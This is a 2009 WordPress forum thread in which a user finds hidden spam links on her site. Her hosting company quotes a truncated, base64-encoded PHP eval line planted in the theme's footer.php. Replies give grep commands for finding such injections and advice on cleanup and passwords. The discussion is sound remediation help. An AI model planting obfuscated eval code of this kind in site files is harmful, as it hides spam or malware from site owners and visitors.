Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme » Plugins & Atahualpa »

Theme hacked via contact form 8?


  #1  
Old Dec 18, 2009, 03:54 PM
paulae's Avatar
paulae
 
1,333 posts · Feb 2009
Wordpress 3.4.1, Atahualpa 3.7.7
Just now, when I viewed my front page with the Chrome browser, there were hundreds of porn site URLs under the footer area! These did not appear in Firefox or Safari. When I looked at the source code, there was a jquery that seemed to have come in via the Contact Form 8 plugin. I let the hosting co. know. They said they this:
Quote:
Looking at the source pasted, and viewed in a Clean VM using Chrome I do not see any added DIV spam or other code. I did, however, find some code a inside your theme Footer files that do explain this behavior.

./wp-content/themes/atahualpa/footer.php
./wp-content/themes/atahualpa344/footer.php


Code: <? eval(base64_decode("CmlmIChwcmVnX21hdGNoICgiL1tHZ1 1bT29dW09vXVtHZ11bTGxdW0VlXS8iLCRfU0VSVkVSWyJIVFRQ X1VTRVJfQUdFTlQiXSkpIHsKCWVjaG8gZmlsZV9nZXRfY29udG VudH ....
I disabled the plugin right away. Now I'm not seeing the rogue code anymore. I'm afraid to re-enable it or install another contact form plugin. Help!
NOTE: The support guys removed the base64 code for me, so that's why I didn't see it. I still don't know why this happened.

Last edited by paulae; Dec 18, 2009 at 04:38 PM.
  #2  
Old Dec 19, 2009, 09:11 AM
js9600
 
29 posts · Dec 2008
Good advertisement for TAC I think http://wordpress.org/extend/plugins/tac/

I just tried scanning with Wordpress Exploit Scanner http://wordpress.org/extend/plugins/exploit-scanner/ but it did not pick up added stuff in footer.php. Actually have no idea what it look for, "signs that may indicate that your website has been compromised by hackers" is what users are told - but probably another way to secure/test site.
  #3  
Old Dec 20, 2009, 03:12 PM
billy2
 
7 posts · Aug 2009
Sounds like a typical iframe injection.

login via ssh2 and from the wp-content directory run:
find . -type f | xargs grep -i "str_rot13"
and
find . -type f | xargs grep -i "base64_decode"

That should list your infected files. Replace the infected ones with clean copies.

Then change all your passwords including FTP, CPanel, wp-admin logins, etc.., and make sure you use a tick harder combination.

Then go back and make sure you have the proper file permissions.. I have 0644 on nearly everything except directories which I run at 0755.

For the record I kept Contact Form 7.

Bookmarks

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Contact Form 7 drop-down-menu format Babs Plugins & Atahualpa 2 Jul 19, 2009 10:04 AM
Contact Form 7; And, Adding Audio SCLove Forum How-To 4 May 21, 2009 06:03 PM
Contact Form 7 & Super Cache SCLove Forum How-To 0 May 20, 2009 11:33 AM
Contact Form 7 zizi Plugins & Atahualpa 2 Apr 15, 2009 09:53 AM
{Can this theme get hacked? djmom70 Atahualpa 3 Wordpress theme 7 Mar 25, 2009 06:54 PM


All times are GMT -6. The time now is 10:48 AM.


Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.